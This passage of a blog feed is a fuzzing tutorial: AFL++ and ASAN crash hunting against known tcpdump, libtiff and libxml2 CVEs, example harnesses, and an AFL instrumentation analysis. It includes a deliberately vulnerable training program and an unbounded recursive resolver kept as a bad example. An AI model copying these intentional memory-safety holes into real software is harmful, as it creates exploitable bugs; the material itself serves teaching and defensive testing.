class="hljs-number">000000</span>\,sig\:<span class="hljs-number">06</span>\,src\:<span class="hljs-number">011483</span>\,time\:<span class="hljs-number">43941578</span>\,execs\:<span class="hljs-number">17770128</span>\,op\:havoc\,rep\:<span class="hljs-number">8</span><br></code></pre></td></tr></table></figure><p>直接运行crash,ASAN会给出较为详细的报错和调用栈</p><p><img src="/image-20220725164803244.png"></p><ul><li>报错信息:<code>AddressSanitizer: heap-buffer-overflow /root/fuzz_target/fuzzing_tcpdump/tcpdump-tcpdump-4.9.2/./extract.h:184:20 in EXTRACT_16BITS</code>,直接说明是堆溢出</li></ul><h2 id="漏洞修复-2"><a href="#漏洞修复-2" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><ul><li><a href="https://github.com/the-tcpdump-group/tcpdump/commit/85078eeaf4bf8fcdc14a4e79b516f92b6ab520fc#diff-05f854a9033643de07f0d0059bc5b98f3b314eeb1e2499ea1057e925e6501ae8L381">https://github.com/the-tcpdump-group/tcpdump/commit/85078eeaf4bf8fcdc14a4e79b516f92b6ab520fc#diff-05f854a9033643de07f0d0059bc5b98f3b314eeb1e2499ea1057e925e6501ae8L381</a></li></ul><h1 id="Exercise-4-libtiff(coverage优化)"><a href="#Exercise-4-libtiff(coverage优化)" class="headerlink" title="Exercise 4 - libtiff(coverage优化)"></a>Exercise 4 - libtiff(coverage优化)</h1><p><a href="https://www.cvedetails.com/cve/CVE-2016-9297/"><strong>CVE-2016-9297</strong></a> in libtiff 4.0.4 (Out-of-bounds Read)</p><h2 id="使用lvoc(覆盖率检测)编译libtiff"><a href="#使用lvoc(覆盖率检测)编译libtiff" class="headerlink" title="使用lvoc(覆盖率检测)编译libtiff"></a>使用lvoc(覆盖率检测)编译libtiff</h2><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs abnf"><span class="hljs-attribute">CFLAGS</span><span class="hljs-operator">=</span><span class="hljs-string">"--coverage"</span> LDFLAGS<span class="hljs-operator">=</span><span class="hljs-string">"--coverage"</span> ./configure --prefix<span class="hljs-operator">=</span><span 
class="hljs-string">"$HOME/fuzz_target/fuzzing_tiff/install/"</span> --disable-shared<br>make<br>make install<br></code></pre></td></tr></table></figure><h2 id="获取覆盖率"><a href="#获取覆盖率" class="headerlink" title="获取覆盖率"></a>获取覆盖率</h2><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs stylus">cd <span class="hljs-variable">$HOME</span>/fuzzing_tiff/tiff-<span class="hljs-number">4.0</span>.<span class="hljs-number">4</span>/<br>lcov <span class="hljs-attr">--zerocounters</span> <span class="hljs-attr">--directory</span> ./<br>lcov <span class="hljs-attr">--capture</span> <span class="hljs-attr">--initial</span> <span class="hljs-attr">--directory</span> ./ <span class="hljs-attr">--output-file</span> app<span class="hljs-selector-class">.info</span><br><span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tiff/install/bin/tiffinfo -D -j -c -r -s -w <span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tiff/tiff-<span class="hljs-number">4.0</span>.<span class="hljs-number">4</span>/test/images/palette-<span class="hljs-number">1</span>c-<span class="hljs-number">1</span>b<span class="hljs-selector-class">.tiff</span><br>lcov <span class="hljs-attr">--no-checksum</span> <span class="hljs-attr">--directory</span> ./ <span class="hljs-attr">--capture</span> <span class="hljs-attr">--output-file</span> app2.info<br></code></pre></td></tr></table></figure><ul><li><p><code>lcov --zerocounters --directory ./</code>:重置计数器</p></li><li><p><code>lcov --capture --initial --directory ./ --output-file app.info</code>:为每个instrumented line返回覆盖率数据的初始化基准</p></li><li><p><code>$HOME/fuzzing_tiff/install/bin/tiffinfo -D -j -c -r -s -w $HOME/fuzzing_tiff/tiff-4.0.4/test/images/palette-1c-1b.tiff0</code>:运行需要分析的应用,可以用多个样本运行多次</p></li><li><p><code>lcov 
--no-checksum --directory ./ --capture --output-file app2.info</code>:保存覆盖率状态</p></li></ul><p>将结果转化生成HTML输出</p><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">genhtml <span class="hljs-params">--highlight</span> <span class="hljs-params">--legend</span> -output-directory <span class="hljs-string">./html-coverage/</span> <span class="hljs-string">./app2.info</span><br></code></pre></td></tr></table></figure><h2 id="编译文件"><a href="#编译文件" class="headerlink" title="编译文件"></a>编译文件</h2><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">export</span> <span class="hljs-attribute">LLVM_CONFIG</span>=<span class="hljs-string">"llvm-config-12"</span><br><span class="hljs-attribute">CC</span>=/root/fuzz/AFLplusplus/afl-clang-lto ./configure <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"<span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tiff/install/"</span> --disable-shared<br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 make -j4<br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 make install<br>afl-fuzz -m none -i <span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tiff/tiff-4.0.4/test/images/ -o <span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tiff/out/ -s 123 -- <span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_tiff/install/bin/tiffinfo -D -j -c -r -s -w @@<br></code></pre></td></tr></table></figure><p>这里使用尽可能多的参数,增大fuzz到漏洞代码的概率</p><h2 id="fuzz-3"><a href="#fuzz-3" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td 
class="code"><pre><code class="hljs awk">afl-fuzz -m none -i <span class="hljs-variable">$HOME</span><span class="hljs-regexp">/fuzz_target/</span>fuzzing_tiff<span class="hljs-regexp">/tiff-4.0.4/</span>test<span class="hljs-regexp">/images/</span> -o <span class="hljs-variable">$HOME</span><span class="hljs-regexp">/fuzz_target/</span>fuzzing_tiff<span class="hljs-regexp">/afl_out/</span> -s <span class="hljs-number">123</span> -- <span class="hljs-variable">$HOME</span><span class="hljs-regexp">/fuzz_target/</span>fuzzing_tiff<span class="hljs-regexp">/install/</span>bin/tiffinfo -D -j -c -r -s -w @@<br></code></pre></td></tr></table></figure><p><img src="/image-20220725165647833.png"></p><h2 id="动态调试-3"><a href="#动态调试-3" class="headerlink" title="动态调试"></a>动态调试</h2><p>查看报错</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">.<span class="hljs-regexp">/install/</span>bin<span class="hljs-regexp">/tiffinfo -D -j -c -r -s -w ./</span>out<span class="hljs-regexp">/default/</span>crashes/id\:<span class="hljs-number">000000</span>\,sig\:<span class="hljs-number">06</span>\,src\:<span class="hljs-number">000016</span>\,time\:<span class="hljs-number">556815</span>\,execs\:<span class="hljs-number">377779</span>\,op\:havoc\,rep\:<span class="hljs-number">4</span> <br></code></pre></td></tr></table></figure><p><img src="/image-20220725165924945.png"></p><ul><li>报错信息:<code>AddressSanitizer: heap-buffer-overflow (/root/fuzz_target/fuzzing_tiff/install/bin/tiffinfo+0x2aaf11) in fputs</code>,堆溢出</li></ul><h2 id="漏洞修复-3"><a href="#漏洞修复-3" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><ul><li><a href="https://github.com/vadz/libtiff/commit/30c9234c7fd0dd5e8b1e83ad44370c875a0270ed">https://github.com/vadz/libtiff/commit/30c9234c7fd0dd5e8b1e83ad44370c875a0270ed</a></li></ul><h1 id="Exercise-5-libxml2(自定义字典、并行)"><a href="#Exercise-5-libxml2(自定义字典、并行)" class="headerlink" 
title="Exercise 5 - libxml2(自定义字典、并行)"></a>Exercise 5 - libxml2(自定义字典、并行)</h1><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9048"><strong>CVE-2017-9048</strong></a> in LibXML2 2.9.4(stack buffer overflow)</p><h2 id="字典用途"><a href="#字典用途" class="headerlink" title="字典用途"></a>字典用途</h2><p>本质上就是有一定意义的字符串token</p><ul><li>Override:直接覆盖样本中的n个字节</li><li>Insert:在样本中插入n个字节</li></ul><p>AFL++提供了现成的<a href="https://github.com/AFLplusplus/AFLplusplus/tree/stable/dictionaries">字典</a>(可以凑合)</p><p>也可以自己手动构建,用codeql(在线平台<a href="https://lgtm.com/#explore">LGTM</a>)可以快速查询我们需要的特征字符串如</p><ul><li>判断的条件</li><li>strcmp、memcmp中的参数</li><li>声明的常量等</li></ul><h2 id="并行"><a href="#并行" class="headerlink" title="并行"></a>并行</h2><p>将fuzzer分为master和slave,实现共享instance</p><figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crmsh">./afl-fuzz -i afl_in -o afl_out -M <span class="hljs-keyword">Master</span> <span class="hljs-title">-- ./program</span> @@<br></code></pre></td></tr></table></figure><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli"><span class="hljs-string">./afl-fuzz</span> -i afl_in -o afl_out -S Slave1 -- <span class="hljs-string">./program</span> @@<br><span class="hljs-string">./afl-fuzz</span> -i afl_in -o afl_out -S Slave2 -- <span class="hljs-string">./program</span> @@<br><span class="hljs-string">...</span><br><span class="hljs-string">./afl-fuzz</span> -i afl_in -o afl_out -S SlaveN -- <span class="hljs-string">./program</span> @@<br></code></pre></td></tr></table></figure><h2 id="编译文件-1"><a href="#编译文件-1" class="headerlink" title="编译文件"></a>编译文件</h2><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs routeros">sudo apt-<span class="hljs-built_in">get</span> install python-dev<br><span class="hljs-attribute">CC</span>=/root/fuzz/AFLplusplus/afl-clang-lto <span class="hljs-attribute">CXX</span>=/root/fuzz/AFLplusplus/afl-clang-lto++ <span class="hljs-attribute">CFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span> <span class="hljs-attribute">CXXFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span> <span class="hljs-attribute">LDFLAGS</span>=<span class="hljs-string">"-fsanitize=address"</span> ./configure <span class="hljs-attribute">--prefix</span>=<span class="hljs-string">"<span class="hljs-variable">$HOME</span>/fuzz_target/fuzzing_libxml2/libxml2/install"</span> --disable-shared --without-<span class="hljs-built_in">debug</span> --without-ftp --without-http --without-legacy --without-python <span class="hljs-attribute">LIBS</span>=<span class="hljs-string">'-ldl'</span><br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 <span class="hljs-attribute">AFL_MAP_SIZE</span>=262144 make -j$(nproc)<br><span class="hljs-attribute">AFL_USE_ASAN</span>=1 <span class="hljs-attribute">AFL_MAP_SIZE</span>=262144 make install<br></code></pre></td></tr></table></figure><p>这里在编译时没有直接用ASAN,而是用了编译器自带的<code>fsanitize</code>,功能如下</p><ul><li><code>-fsanitize=leak</code>:检测内存泄漏</li><li><code>-fsanitize=address</code>:检测内存越界,这等于ASAN</li></ul><p>编译时设置AFL_MAP_SIZE=262144,决定共享空间大小,因为程序较大,不改成一个较大值会给弹一个警告,最好设置一下。</p><h2 id="获取样本和字典"><a href="#获取样本和字典" class="headerlink" title="获取样本和字典"></a>获取样本和字典</h2><p>这里用的是fuzzing101提供的样本以及test中的dtd9(DTD,它们会定义 XML 文档的结构和合法元素/属性,并用于确定 xml 文档是否有效)。</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">mkdir afl_in && cd 
afl_in<br>wget https:<span class="hljs-regexp">//</span>raw.githubusercontent.com<span class="hljs-regexp">/antonio-morales/</span>Fuzzing101<span class="hljs-regexp">/main/</span>Exercise%<span class="hljs-number">205</span>/SampleInput.xml<br>cd ..<br></code></pre></td></tr></table></figure><p>使用AFL++提供的字典</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">mkdir dictionaries && cd dictionaries<br>wget https:<span class="hljs-regexp">//</span>raw.githubusercontent.com<span class="hljs-regexp">/AFLplusplus/</span>AFLplusplus<span class="hljs-regexp">/stable/</span>dictionaries/xml.dict<br>cd ..<br></code></pre></td></tr></table></figure><h2 id="fuzz-4"><a href="#fuzz-4" class="headerlink" title="fuzz"></a>fuzz</h2><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">afl-fuzz -m none -i <span class="hljs-string">./afl_in</span> -o afl_out -s 123 -x <span class="hljs-string">./dictionaries/xml.dict</span> -D -M master -- <span class="hljs-string">./xmllint</span> <span class="hljs-params">--memory</span> <span class="hljs-params">--noenc</span> <span class="hljs-params">--nocdata</span> <span class="hljs-params">--dtdattr</span> <span class="hljs-params">--loaddtd</span> <span class="hljs-params">--valid</span> <span class="hljs-params">--xinclude</span> @@<br>afl-fuzz -m none -i <span class="hljs-string">./afl_in</span> -o afl_out -s 234 -S slave1 -- <span class="hljs-string">./xmllint</span> <span class="hljs-params">--memory</span> <span class="hljs-params">--noenc</span> <span class="hljs-params">--nocdata</span> <span class="hljs-params">--dtdattr</span> <span class="hljs-params">--loaddtd</span> <span class="hljs-params">--valid</span> <span 
class="hljs-params">--xinclude</span> @@<br></code></pre></td></tr></table></figure><ul><li>-D:打开persistent mutations</li></ul><p>然后要跑很久,居然是靠havoc出的让我很意外</p><p><img src="/%60%5BQA7RIPKA%25%60%60LOH%6017%7BN2R.png"></p><h2 id="动态调试-4"><a href="#动态调试-4" class="headerlink" title="动态调试"></a>动态调试</h2><p>先手动编译出不插桩的程序,丢进gdb里调试</p><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">gdb <span class="hljs-params">--args</span> <span class="hljs-string">./xmllint</span> <span class="hljs-params">--memory</span> <span class="hljs-params">--noenc</span> <span class="hljs-params">--nocdata</span> <span class="hljs-params">--dtdattr</span> <span class="hljs-params">--loaddtd</span> <span class="hljs-params">--valid</span> <span class="hljs-params">--xinclude</span> <span class="hljs-string">./afl_out/slave1/crashes/id</span><span class="hljs-function">:000009</span>,sig<span class="hljs-function">:06</span>,src<span class="hljs-function">:009269</span>,time<span class="hljs-function">:119653664</span>,execs<span class="hljs-function">:60774850</span>,op<span class="hljs-function">:havoc</span>,rep<span class="hljs-function">:4</span><br></code></pre></td></tr></table></figure><p><img src="/image-20220719232340167.png"></p><ul><li><p>报错信息<code>*** stack smashing detected ***: terminated</code>,判断为栈溢出漏洞</p></li><li><p>漏洞位置<code>__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50</code>,找到问题代码</p></li></ul><h2 id="漏洞修复-4"><a href="#漏洞修复-4" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><ul><li><a href="https://github.com/GNOME/libxml2/commit/932cc9896ab41475d4aa429c27d9afd175959d74">https://github.com/GNOME/libxml2/commit/932cc9896ab41475d4aa429c27d9afd175959d74</a></li></ul>]]></content>
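<![CDATA[
The Exercise 1 backtrace (the same frames repeating until a segfault deep inside malloc) and the fix described for it (a depth counter) are easier to see on a small model. The following is an added example, not code from this post or from Xpdf: a toy resolver for PDF-style indirect object references, loading an object table from a constructed line format ("num value" or "num R target"). A file whose references form a cycle drives the naive resolver into unbounded recursion until the stack guard page is hit; the hardened version carries a depth counter in the same shape as the Xpdf 4.x fix. The text format, the function names and the limit MAX_DEPTH are assumptions for this example.

```c
/* Added example (not from the post or Xpdf): reference resolution with and
 * without a recursion bound.  Input format is constructed for this example. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_OBJS  16
#define MAX_DEPTH 32            /* assumed limit; Xpdf's own value differs */

enum obj_kind { OBJ_NONE, OBJ_INT, OBJ_REF };

struct obj {
    enum obj_kind kind;
    long value;                 /* integer value, or target object number for OBJ_REF */
};

struct xref {
    struct obj objs[MAX_OBJS];
};

/* Parse "num value\n" / "num R target\n" lines into the object table.
 * Returns the number of objects read, or -1 for a malformed line or an
 * out-of-range object number (lines are copied so a missing field on one
 * line cannot silently consume the next line). */
int xref_load(const char *text, struct xref *x)
{
    int count = 0;
    const char *line = text;
    memset(x, 0, sizeof *x);
    while (*line) {
        char buf[64];
        int num, target;
        long ival;
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        if (len >= sizeof buf) return -1;
        memcpy(buf, line, len);
        buf[len] = '\0';
        if (sscanf(buf, "%d R %d", &num, &target) == 2) {
            if (num < 0 || num >= MAX_OBJS) return -1;
            x->objs[num].kind = OBJ_REF;
            x->objs[num].value = target;
        } else if (sscanf(buf, "%d %ld", &num, &ival) == 2) {
            if (num < 0 || num >= MAX_OBJS) return -1;
            x->objs[num].kind = OBJ_INT;
            x->objs[num].value = ival;
        } else {
            return -1;
        }
        count++;
        if (!nl) break;
        line = nl + 1;
    }
    return count;
}

/* Vulnerable: follows references with no bound.  Two objects that point at
 * each other recurse until the stack is exhausted; the SIGSEGV then lands in
 * whatever function touches the stack next (malloc, in the Xpdf backtrace). */
struct obj resolve_unbounded(const struct xref *x, struct obj o)
{
    struct obj none = { OBJ_NONE, 0 };
    if (o.kind != OBJ_REF) return o;
    if (o.value < 0 || o.value >= MAX_OBJS) return none;
    return resolve_unbounded(x, x->objs[o.value]);
}

/* Hardened: the depth counter turns a reference cycle into a parse error. */
struct obj resolve_bounded(const struct xref *x, struct obj o, int depth)
{
    struct obj none = { OBJ_NONE, 0 };
    if (depth > MAX_DEPTH) return none;         /* the fix: refuse to go deeper */
    if (o.kind != OBJ_REF) return o;
    if (o.value < 0 || o.value >= MAX_OBJS) return none;
    return resolve_bounded(x, x->objs[o.value], depth + 1);
}

/* Load `text` and resolve object `num` to an integer.  Returns the integer,
 * or -1 when the input is malformed, the object is not an integer, or the
 * reference chain is cyclic / too deep. */
long demo_resolve(const char *text, int num)
{
    struct xref x;
    struct obj o;
    if (xref_load(text, &x) < 0 || num < 0 || num >= MAX_OBJS) return -1;
    o = resolve_bounded(&x, x.objs[num], 0);
    return o.kind == OBJ_INT ? o.value : -1;
}

/* Constructed inputs: a legitimate chain, and the cycle a fuzzer would find. */
const char *SAMPLE_CHAIN = "0 42\n1 R 0\n2 R 1\n";
const char *SAMPLE_CYCLE = "0 42\n1 R 2\n2 R 1\n";

int main(int argc, char **argv)
{
    const char *text = argc > 1 ? argv[1] : SAMPLE_CYCLE;
    long v = demo_resolve(text, 2);
    if (v < 0) printf("object 2: unresolvable (malformed, cycle or too deep)\n");
    else printf("object 2 = %ld\n", v);
    return 0;
}
```

Only `resolve_bounded` is exercised by the wrapper; `resolve_unbounded` is kept beside it to show the one-line difference. Feeding SAMPLE_CYCLE to the unbounded version reproduces the stack-exhaustion crash from Exercise 1 in miniature.
]]>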
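<![CDATA[
Exercise 2 mentions the first option for fuzzing a library, writing a small C program that calls its API, and Exercise 1 explains the difference between `@@` and standard input. The following is an added example, not libexif's code or the exif tool: the minimal harness shape (read one input, either the file whose path afl-fuzz substitutes for `@@` or stdin, and hand the bytes to the code under test), wrapped around a toy parser for the TIFF header that an EXIF payload starts with. Every multi-byte read goes through a bounds-checked accessor, which is exactly the check whose absence produced the `exif_get_sshort` / `exif_get_slong` crashes above: the IFD offset comes from the file, and an unchecked read at that offset walks off the end of the heap buffer. The parser, the function names and MAX_INPUT are assumptions for this example.

```c
/* Added example harness (not from libexif or the exif tool). */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_INPUT (1u << 20)     /* assumed cap: 1 MiB per test case */

enum byte_order { ORDER_INTEL, ORDER_MOTOROLA };

/* Bounds-checked 16-bit read: 0 on success, -1 unless both bytes lie inside
 * buf[0..len).  Written as len - off < 2 so that off + 2 can never wrap. */
static int get_u16(const uint8_t *buf, size_t len, size_t off,
                   enum byte_order order, uint16_t *out)
{
    if (off > len || len - off < 2) return -1;
    *out = order == ORDER_INTEL ? (uint16_t)(buf[off] | (buf[off + 1] << 8))
                                : (uint16_t)((buf[off] << 8) | buf[off + 1]);
    return 0;
}

static int get_u32(const uint8_t *buf, size_t len, size_t off,
                   enum byte_order order, uint32_t *out)
{
    uint32_t b0, b1, b2, b3;
    if (off > len || len - off < 4) return -1;
    b0 = buf[off]; b1 = buf[off + 1]; b2 = buf[off + 2]; b3 = buf[off + 3];
    *out = order == ORDER_INTEL ? (b0 | (b1 << 8) | (b2 << 16) | (b3 << 24))
                                : ((b0 << 24) | (b1 << 16) | (b2 << 8) | b3);
    return 0;
}

/* TIFF header: bytes 0-1 "II"/"MM", bytes 2-3 magic 42, bytes 4-7 offset of
 * the first IFD, and at that offset a 16-bit entry count.  Returns the entry
 * count, or -1 for anything malformed or truncated.  The IFD offset is
 * attacker controlled; without the check inside get_u16 the last read would
 * be the same wild read as crash1. */
int parse_tiff_header(const uint8_t *buf, size_t len)
{
    enum byte_order order;
    uint16_t magic, count;
    uint32_t ifd_off;

    if (len < 8) return -1;
    if (buf[0] == 'I' && buf[1] == 'I') order = ORDER_INTEL;
    else if (buf[0] == 'M' && buf[1] == 'M') order = ORDER_MOTOROLA;
    else return -1;
    if (get_u16(buf, len, 2, order, &magic) < 0 || magic != 42) return -1;
    if (get_u32(buf, len, 4, order, &ifd_off) < 0) return -1;
    if (get_u16(buf, len, ifd_off, order, &count) < 0) return -1;
    return count;
}

/* Read all of `fp` into a malloc'd buffer (caller frees); NULL on error or
 * when the input exceeds MAX_INPUT. */
static uint8_t *read_all(FILE *fp, size_t *len)
{
    uint8_t *buf = NULL;
    size_t cap = 0, n = 0;
    for (;;) {
        size_t r;
        if (n == cap) {
            uint8_t *nb;
            cap = cap ? cap * 2 : 4096;
            if (cap > MAX_INPUT || !(nb = realloc(buf, cap))) { free(buf); return NULL; }
            buf = nb;
        }
        r = fread(buf + n, 1, cap - n, fp);
        n += r;
        if (r == 0) break;
    }
    *len = n;
    return buf;
}

/* Constructed test cases. */
const uint8_t SAMPLE_OK[]       = { 'M','M', 0x00,0x2A, 0x00,0x00,0x00,0x08, 0x00,0x03 }; /* IFD at 8, 3 entries */
const uint8_t SAMPLE_WILD_IFD[] = { 'I','I', 0x2A,0x00, 0xFF,0xFF,0xFF,0x7F };           /* IFD far past the buffer */
const uint8_t SAMPLE_TRUNC[]    = { 'I','I', 0x2A,0x00, 0x08,0x00,0x00,0x00, 0x02 };      /* count field cut in half */

int main(int argc, char **argv)
{
    /* With @@ afl-fuzz passes the test-case path as argv[1]; without @@ it
     * writes the test case to stdin, so the harness accepts both. */
    FILE *fp = argc > 1 ? fopen(argv[1], "rb") : stdin;
    size_t len;
    uint8_t *buf;
    if (!fp) { perror("fopen"); return 1; }
    buf = read_all(fp, &len);
    if (fp != stdin) fclose(fp);
    if (!buf) return 1;
    printf("entries: %d\n", parse_tiff_header(buf, len));
    free(buf);
    return 0;
}
```

Build it with `afl-clang-fast harness.c -o harness` and fuzz with `afl-fuzz -i seeds -o out -- ./harness @@` (or drop the `@@` to feed stdin). Replacing `parse_tiff_header` with a call into the real library (`exif_data_load_data` in libexif's case) gives the harness from option 1 of Exercise 2.
]]>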
<tags>
<tag>Fuzz</tag>
</tags>
</entry>
<entry>
<title>Analysis of the fuzzing workflow in the AFL source code</title>
<link href="/2022/05/04/AFL%E6%BA%90%E7%A0%81fuzzing%E6%B5%81%E7%A8%8B%E5%88%86%E6%9E%90/"/>
<url>/2022/05/04/AFL%E6%BA%90%E7%A0%81fuzzing%E6%B5%81%E7%A8%8B%E5%88%86%E6%9E%90/</url>
<content type="html"><![CDATA[<h1 id="source-code-fuzzing的基本流程"><a href="#source-code-fuzzing的基本流程" class="headerlink" title="The basic source-code fuzzing workflow"></a>The basic source-code fuzzing workflow</h1><p><img src="/image-20220429194405206.png" alt="Overall workflow"></p><p>The two parts that matter are instrumenting the target and the fuzzer itself.</p>
<h1 id="Instrument"><a href="#Instrument" class="headerlink" title="Instrument"></a>Instrument</h1><p>The compiler wrapper you pick decides how the target is instrumented, and that has a direct effect on how efficiently it can be fuzzed later.</p><ul><li><p>LTO mode (afl-clang-lto/afl-clang-lto++)</p><p>LTO (Link Time Optimization) optimises at link time: the intermediate files of all translation units are merged and optimised as one program, which allows whole-program analysis and cross-module optimisation and usually shrinks the code. Because the whole program is visible at once, AFL++ can assign edge IDs without collisions.</p><p>Requires LLVM 11+. It is the most effective instrumentation mode AFL++ currently supports (in theory; in practice other factors interfere, as happened when fuzzing libxml2), at the price of noticeably longer build times.</p></li><li><p>LLVM mode (afl-clang-fast/afl-clang-fast++)</p><p>Implemented as an LLVM pass, stable, the most widely used mode, and it works for non-x86 targets.</p><p>Instruments at the compiler IR level, which gives better results than the assembly-level instrumentation of afl-gcc.</p></li><li><p>GCC_PLUGIN mode (afl-gcc-fast/afl-g++-fast)</p><p>Roughly equivalent to LLVM mode, but implemented as a GCC plugin; also recommended.</p></li><li><p>GCC mode (afl-gcc/afl-g++) (or afl-clang/afl-clang++ for clang)</p><p>The classic mode: the wrapper lets the real compiler emit assembly and afl-as rewrites it. Nothing to recommend it over the others; it is only a fallback when none of the above is available.</p></li></ul><p>The differences between the modes follow from where in the compilation pipeline each one hooks in:</p><p><img src="/image-20220430011819706.png" alt="Compilation stages"></p>
<h2 id="afl-gcc插桩分析"><a href="#afl-gcc插桩分析" class="headerlink" title="afl-gcc instrumentation"></a>afl-gcc instrumentation</h2><p>Since the instrumentation changes with the compiler choice, start with the simplest one, afl-gcc.</p><p>Compile a small program with <code>afl-gcc</code> (<a href="https://github.com/mykter/afl-training">source</a>):</p><figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c">#include <string.h><br>#include <stdio.h><br>#include <unistd.h><br>#include <stdlib.h><br><br>#define INPUTSIZE 100<br><br>int process(char *input)<br>{<br>    char *out;<br>    char *rest;<br>    int len;<br>    if (strncmp(input, "u ", 2) == 0)<br>    { // upper case command<br>        char *rest;<br>        len = strtol(input + 2, &rest, 10); // how many characters of the string to upper-case<br>        rest += 1;                          // skip the first char (should be a space)<br>        out = malloc(len + strlen(input));  // could be shorter, but play it safe<br>        if (len > (int)strlen(input))<br>        {<br>            printf("Specified length %d was larger than the input!\n", len);<br>            return 1;<br>        }<br>        else if (out == NULL)<br>        {<br>            printf("Failed to allocate memory\n");<br>            return 1;<br>        }<br>        for (int i = 0; i != len; i++)<br>        {<br>            char c = rest[i];<br>            if (c > 96 && c < 123) // ascii a-z<br>            {<br>                c -= 32;<br>            }<br>            out[i] = c;<br>        }<br>        out[len] = 0;<br>        strcat(out, rest + len); // append the remaining text<br>        printf("%s", out);<br>        free(out);<br>    }<br>    else if (strncmp(input, "head ", 5) == 0)<br>    { // head command<br>        if (strlen(input) > 6)<br>        {<br>            len = strtol(input + 4, &rest, 10);<br>            rest += 1;        // skip the first char (should be a space)<br>            rest[len] = '\0'; // truncate string at specified offset<br>            printf("%s\n", rest);<br>        }<br>        else<br>        {<br>            fprintf(stderr, "head input was too small\n");<br>        }<br>    }<br>    else if (strcmp(input, "surprise!\n") == 0)<br>    {<br>        // easter egg!<br>        *(char *)1 = 2;<br>    }<br>    else<br>    {<br>        return 1;<br>    }<br>    return 0;<br>}<br><br>int main(int argc, char *argv[])<br>{<br>    char *usage = "Usage: %s\n"<br>                  "Text utility - accepts commands and data on stdin and prints results to stdout.\n"<br>                  "\tInput | Output\n"<br>                  "\t------------------+-----------------------\n"<br>                  "\tu <N> <string> | Uppercased version of the first <N> bytes of <string>.\n"<br>                  "\thead <N> <string> | The first <N> bytes of <string>.\n";<br>    char input[INPUTSIZE] = {0};<br><br>    // Slurp input<br>    if (read(STDIN_FILENO, input, INPUTSIZE) < 0)<br>    {<br>        fprintf(stderr, "Couldn't read stdin.\n");<br>    }<br><br>    int ret = process(input);<br>    if (ret)<br>    {<br>        fprintf(stderr, usage, argv[0]);<br>    };<br>    return ret;<br>}<br></code></pre></td></tr></table></figure><p>Obviously, as soon as the input is the magic string <code>surprise!\n</code>, the program writes to an invalid address; and the different command prefixes (<code>u</code>, <code>head</code>) create several branches, which is enough to watch how AFL mutates its inputs.</p><p><img src="/image-20220429215246469.png"></p><p>Because of the many branches and jumps, afl-as reports 52 instrumented locations.</p><p><img src="/image-20220429215913971.png"></p><p>Loading the binary in IDA shows many calls to <code>__afl_maybe_log</code> in the generated functions; they are inserted by afl-gcc. Looking at where they sit, they are at function entries and at the start of the basic blocks reached from conditional jumps, i.e. exactly the points needed to record edge coverage.</p><p>Likewise, compiling with afl-clang-fast adds a new function, <code>__sanitizer_cov_trace_pc_guard</code>; I will go through how that works together with the source later.</p><p><img src="/image-20220429204941067.png"></p>
<h1 id="Fuzz-target"><a href="#Fuzz-target" class="headerlink" title="Fuzz target"></a>Fuzz target</h1><p>The source is long, so I picked a few important functions to analyse.</p>
